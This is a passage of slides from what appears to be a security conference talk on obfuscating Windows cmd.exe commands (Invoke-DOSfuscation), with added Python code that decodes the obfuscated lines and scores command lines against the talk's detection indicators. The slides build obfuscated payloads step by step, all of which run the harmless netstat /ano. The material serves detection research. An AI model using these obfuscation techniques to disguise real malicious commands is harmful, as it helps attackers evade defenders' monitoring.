• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:*final!=%"
182
C:\> echo %final%
!final!netstat /ano
C:\> echo %final:~7%
netstat /ano
C:\> echo %final:*final!=%
netstat /ano
Payload Obfuscation 3 of 4: Reversal
• cmd /v /r "set command=netstat /ano&&CALL %command%"
183
Payload Obfuscation 4 of 4: FINcoding
• cmd /v /r "set command=neZsZaZ /ano&&CALL %command%"
184
Payload Obfuscation 4 of 4: FINcoding
t -> Z
• cmd /v /r "set command=neZsZaZ /ano&&set sub1=!command:Z=t!&&CALL %command%"
185
Z -> t
Payload Obfuscation 4 of 4: FINcoding
t -> Z
• cmd /v /r "set command=neZsZaZ /ano&&set sub1=!command:Z=t!&&CALL %sub1%"
186
Z -> t
Payload Obfuscation 4 of 4: FINcoding
t -> Z
• cmd /v /r "set command=neZsZ7Z /7no&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&CALL %sub2%"
187
Z -> t
7 -> a
Payload Obfuscation 4 of 4: FINcoding
t -> Z
a -> 7
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
188
Z -> t
7 -> a
? -> n
t -> Z
a -> 7
n -> ?
Payload Obfuscation 4 of 4: FINcoding
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
189
Payload Obfuscation 4 of 4: FINcoding
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
• Layered escaping of &&
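The FORcoding, reversal and FINcoding payloads above all lean on the same handful of cmd.exe expansion rules: delayed !var! expansion inside a FOR loop, the :~N,M substring and :str=repl replacement modifiers, an undefined reference being kept as literal text on the command line, and CALL's second round of %var% expansion. The Python emulator below is an added example written for this page, not code from the slides or from Invoke-DOSfuscation; it recovers the original command from the plain, non-layered forms shown on slides 177 through 189 and assumes the input is the cmd /v /r "..." wrapper exactly as printed there. The sample lines are copied from those slides, and the function names decode, expand, execute and apply_modifier are this example's own.

```python
import re

# Added example, not code from the Invoke-DOSfuscation slides or tool: a minimal emulator of the
# cmd.exe /V constructs that FORcoding, reversal and FINcoding payloads rely on. It models only
# the plain forms shown on the slides: SET, FOR [/L] %X IN (...) DO, IF a==b, CALL and the
# %var:...% / !var:...! substring and replacement modifiers.

DELAYED_RE = re.compile(r"!(\w+)(?::([^!]+))?!")      # !var! or !var:modifier!
PERCENT_RE = re.compile(r"%(\w+)(?::([^%]+))?%")      # %var% or %var:modifier%
FOR_RE = re.compile(r"\bFOR(\s+/L)?\s+%(\w)\s+IN\s*\(([^)]*)\)\s*DO\s+(.*)$", re.I | re.S)
SET_RE = re.compile(r"set\s+(\w+)=(.*)$", re.I | re.S)
IF_RE = re.compile(r"IF\s+([^=\s]+)\s*==\s*(\S+)\s+(.*)$", re.I | re.S)
CALL_RE = re.compile(r"CALL\s+(.*)$", re.I | re.S)
WRAPPER_RE = re.compile(r'^\s*cmd(?:\.exe)?(?:\s+/\w+)*\s+"(.*)"\s*$', re.I | re.S)


def apply_modifier(value, spec):
    """Apply one expansion modifier: ~N or ~N,M (substring; negative N counts from the end,
    negative M drops characters from the end), str=repl (replace all, case-insensitive) or
    *str=repl (replace everything up to and including the first occurrence of str)."""
    if spec.startswith("~"):
        start_s, _, len_s = spec[1:].replace(" ", "").partition(",")
        start = int(start_s or 0)
        if start < 0:
            start = max(len(value) + start, 0)
        if not len_s:
            return value[start:]
        length = int(len_s)
        end = start + length if length >= 0 else len(value) + length
        return value[start:end]
    if spec.startswith("*"):
        needle, _, repl = spec[1:].partition("=")
        idx = value.lower().find(needle.lower())
        return value if idx < 0 else repl + value[idx + len(needle):]
    needle, _, repl = spec.partition("=")
    return re.sub(re.escape(needle), lambda _m: repl, value, flags=re.IGNORECASE)


def expand(text, env, delayed):
    """Expand !var! (delayed) or %var% (percent) references. On the interactive command line
    cmd.exe keeps an undefined reference as literal text, which is why the first FOR iteration
    leaves the literal prefix "!final!" that slide 180 shows in echo %final%."""
    def repl(m):
        name, spec = m.group(1).lower(), m.group(2)
        if name not in env:
            return m.group(0)
        return apply_modifier(env[name], spec) if spec else env[name]
    return (DELAYED_RE if delayed else PERCENT_RE).sub(repl, text)


def execute(stmt, env, executed):
    """Run one &&-separated statement against the emulated environment."""
    stmt = stmt.strip()
    if not stmt:
        return
    if m := SET_RE.match(stmt):
        env[m.group(1).lower()] = expand(m.group(2), env, delayed=True)
    elif m := IF_RE.match(stmt):
        if m.group(1) == m.group(2):            # == is a string comparison in cmd.exe
            execute(m.group(3), env, executed)
    elif m := CALL_RE.match(stmt):
        executed.append(expand(m.group(1), env, delayed=False))   # CALL re-expands %var%
    else:
        executed.append(expand(stmt, env, delayed=False))


def decode(cmdline):
    """Return the command(s) a cmd /v /r "..." line would finally hand to CALL."""
    m = WRAPPER_RE.match(cmdline)
    if not m:
        raise ValueError('expected a cmd /v /r "..." wrapper')
    inner = m.group(1)
    env, executed = {}, []
    loop = FOR_RE.search(inner)
    for stmt in (inner[:loop.start()] if loop else inner).split("&&"):
        execute(stmt, env, executed)
    if loop:
        use_l, var, items, body = loop.groups()
        if use_l:   # FOR /L (start step end), end inclusive
            start, step, end = (int(x) for x in items.split())
            values = range(start, end + (1 if step > 0 else -1), step)
        else:       # FOR %X IN (list): whitespace, commas and semicolons all delimit
            values = [v for v in re.split(r"[\s,;]+", items) if v]
        for v in values:
            for stmt in body.replace("%" + var, str(v)).split("&&"):
                execute(stmt, env, executed)
    return executed


# Command lines copied from slides 177, 181, 182 and 189
SAMPLES = {
    "reversal_tail": 'cmd /v /r "set reverse=ona/ tatsten&&FOR /L %A IN (11 -1 0) DO set final=!final!!reverse:~%A,1!&&IF %A==0 CALL %final:~-12%"',
    "forcoding": 'cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"',
    "reversal_offset": 'cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~7%"',
    "reversal_strip": 'cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:*final!=%"',
    "fincoding": 'cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"',
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name:>16}: {decode(line)}")
```

Every sample decodes to netstat /ano, which is the check an analyst wants before reading the obfuscated line by hand. The emulator deliberately does not normalise the layered variants from slides 171 to 175 (random case, caret and delimiter insertion, parentheses, explicit signing); those have to be stripped first, and their presence is exactly what the detection heuristics later in the deck key on.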
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
C:\> Invoke-DOSfuscation Public Release & Live Demo
Detecting DOSfuscation
194
• Please do not use this tool for evil.
• FIN7, FIN8 & APT32: Please do not use this tool at all ☺
195
DISCLAIMER
https://github.com/danielbohannon/Invoke-DOSfuscation
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Public Release & Live Demo
C:\> Detecting DOSfuscation
196
• Long argument length
• High frequency of obfuscation characters: , ; ^ " ( )
• Rare obfuscation of internal commands:
• C^AL^^L or ;SET,
• Unusual execution flags:
• /V or /R (or /^R)
• Variable substring and replacement syntax:
• %var:~7,1% or !var:~%a,1! or !var:*var=!
197
Detecting DOSfuscation (more details in white paper)
https://moviefiednyc.files.wordpress.com/2013/11/e0006-ace-ventura-pet-detective-512c7fac5d838.png
• Suspicious sub-command and stdin child process artifacts
• FOR loop executes sub-command via separate cmd.exe invocation
• Cmd.exe pipeline to add'l binary (e.g. findstr.exe) spawns pre-pipe arguments via separate cmd.exe invocation with these arguments: cmd.exe /S /D /c" set"
• Tell-tale formatting of that child command line: double whitespace; no space between /c & "; whitespace after first "
198
Detecting DOSfuscation (more details in white paper)
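The indicators on these two slides are stated as prose; to make them testable, here is an added Python static scorer written for this page, not code from the slides or from the Invoke-DOSfuscationTestHarness module. It turns each indicator into a regular expression and runs them over a few command lines: two copied from the slides (the layered FORcoding line from slide 172 and the plain reversal from slide 177), the child cmd.exe arguments from slide 198, and two constructed benign baselines. The thresholds LONG_ARG_LEN, OBF_CHAR_RATIO and OBF_CHAR_MIN, the keyword list, and the function names indicators and score are assumptions of this example, not numbers from the talk or the white paper.

```python
import re

# Added example, not code from the slides or from Invoke-DOSfuscationTestHarness: a static scorer
# that turns the indicators listed on slides 197-198 into regular expressions. The thresholds
# below are assumptions chosen for this example, not numbers from the talk or the white paper.
LONG_ARG_LEN = 150      # assumption for "long argument length"
OBF_CHAR_RATIO = 0.10   # assumption: share of , ; ^ " ( ) in the whole command line
OBF_CHAR_MIN = 10       # assumption: ignore the ratio on very short lines

KEYWORDS = ("set", "call", "for", "if", "echo", "cmd")
# "C^AL^^L": keyword letters with carets inserted between them (plain matches are filtered out)
CARET_KEYWORD_RES = [
    re.compile(r"\b" + r"\^*".join(re.escape(ch) for ch in kw) + r"\b", re.I) for kw in KEYWORDS
]
# ";SET,": a comma or semicolon glued directly onto a keyword
DELIM_KEYWORD_RE = re.compile(r"[;,](?=(?:set|call|for|if|echo|cmd)\b)", re.I)
# /V or /R, optionally caret-escaped (/^R), used as an execution flag
CMD_FLAG_RE = re.compile(r"/\^?[vr](?=[\s,;/\":]|$)", re.I)
# %var:~7,1%  !var:~%a,1!  !var:*var=!  !var:Z=t!  (a caret may sit inside the name)
VAR_SUBSTR_RE = re.compile(r"[%!][\w^]+:(?:~|\*|[^%!=]+=)")
# child cmd.exe spawned for a FOR sub-command or a pipeline: no space between /c and the quote
CHILD_ARTIFACT_RE = re.compile(r'/c"', re.I)


def indicators(cmdline):
    """Return {indicator_name: evidence} for every slide-197/198 heuristic the line trips."""
    hits = {}
    if not cmdline:
        return hits
    if len(cmdline) > LONG_ARG_LEN:
        hits["long_argument"] = len(cmdline)
    n = sum(cmdline.count(c) for c in ',;^"()')
    if n >= OBF_CHAR_MIN and n / len(cmdline) >= OBF_CHAR_RATIO:
        hits["obfuscation_char_ratio"] = round(n / len(cmdline), 2)
    broken = [m.group(0) for rx in CARET_KEYWORD_RES
              for m in rx.finditer(cmdline) if "^" in m.group(0)]
    broken += [cmdline[m.start():m.start() + 5] for m in DELIM_KEYWORD_RE.finditer(cmdline)]
    if broken:
        hits["obfuscated_keyword"] = broken[:3]
    if m := CMD_FLAG_RE.search(cmdline):
        hits["unusual_cmd_flag"] = m.group(0)
    if m := VAR_SUBSTR_RE.search(cmdline):
        hits["var_substring_or_replace"] = m.group(0)
    if CHILD_ARTIFACT_RE.search(cmdline):
        hits["child_cmd_artifact"] = '/c"'
    return hits


def score(cmdline):
    """One point per distinct indicator; the caller picks the alerting threshold."""
    return len(indicators(cmdline))


SAMPLES = {
    # copied from slide 172 (FORcoding with random case, whitespace and comma/semicolon layers)
    "forcoding_layered": ',;cMd;/v;,;/R "sET unIQuE=OnBeFtUsS C/AaToE &&,; foR ;,;%a ,;;iN;,,;( , 1; 3 5 7 5 13 5,,9 11 13 1;;15 1337;,),;,;dO,,;;sEt fINal=!finAl!!uniQue:~ %a, 1!&&;;;iF,, ,%a;;,==,,;1337,;;,CalL;,,;%fInAl:~ -12% "',
    # copied from slide 177 (plain reversal, no insertion layers)
    "reversal_plain": 'cmd /v /r "set reverse=ona/ tatsten&&FOR /L %A IN (11 -1 0) DO set final=!final!!reverse:~%A,1!&&IF %A==0 CALL %final:~-12%"',
    # copied from slide 198 (arguments of the child cmd.exe spawned by a pipeline)
    "pipeline_child": 'cmd.exe /S /D /c" set"',
    # constructed benign baselines
    "benign_dir": r"cmd /c dir /b C:\Users\Public",
    "benign_echo": 'cmd /c "echo %DATE% & whoami"',
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name:>18}: score={score(line)} {indicators(line)}")
```

The layered slide-172 line trips five of the six indicators while the two benign lines trip none; the plain reversal still scores two (the /V flag and the substring syntax), which is the point of slide 179's note that the payload stays detectable even without insertion characters. The child-process artifact is a process-creation signal rather than a command-line one, so in practice it is matched against the child's arguments with the parent being cmd.exe, as slide 198 describes.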
199
http://smurfitschoolblog.com/wp-content/uploads/2016/10/MissingOutImg_1-900x578.jpg
200
http://smurfitschoolblog.com/wp-content/uploads/2016/10/MissingOutImg_1-900x578.jpg
Obfuscation
• Invoke-DOSfuscationTestHarness.psm1: THE module I used to develop detection ideas
• Invoke-DosTestHarness
• Get-DosDetectionMatch
• Released 4000 sample obfuscated commands as .txt & .evtx files for static and dynamic purposes
201
Detecting DOSfuscation – Test Harness FTW!
• Attackers are using more creative command argument obfuscation techniques
• Cmd.exe supports significant obfuscation and encoding capabilities not yet seen in the wild
• Defenders must match levels of attacker creativity with detection creativity
202
Black Hat Sound Bytes
• FireEye Advanced Practices Team
• Nick Carr, Matthew Dunwoody, Ben Withnell
• My wife: Paige
• 9 months research & hunting (500+ hours)
• 320 hours Invoke-DOSfuscation tool development
• 100 hours slide/presentation development & 100 hours white paper
203
Credit Where Credit Is Due
• Daniel Bohannon
• Twitter :: @danielhbohannon
• Blog :: http://danielbohannon.com
• Code: https://github.com/danielbohannon/Invoke-DOSfuscation
• White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html
204
Thanks! Questions?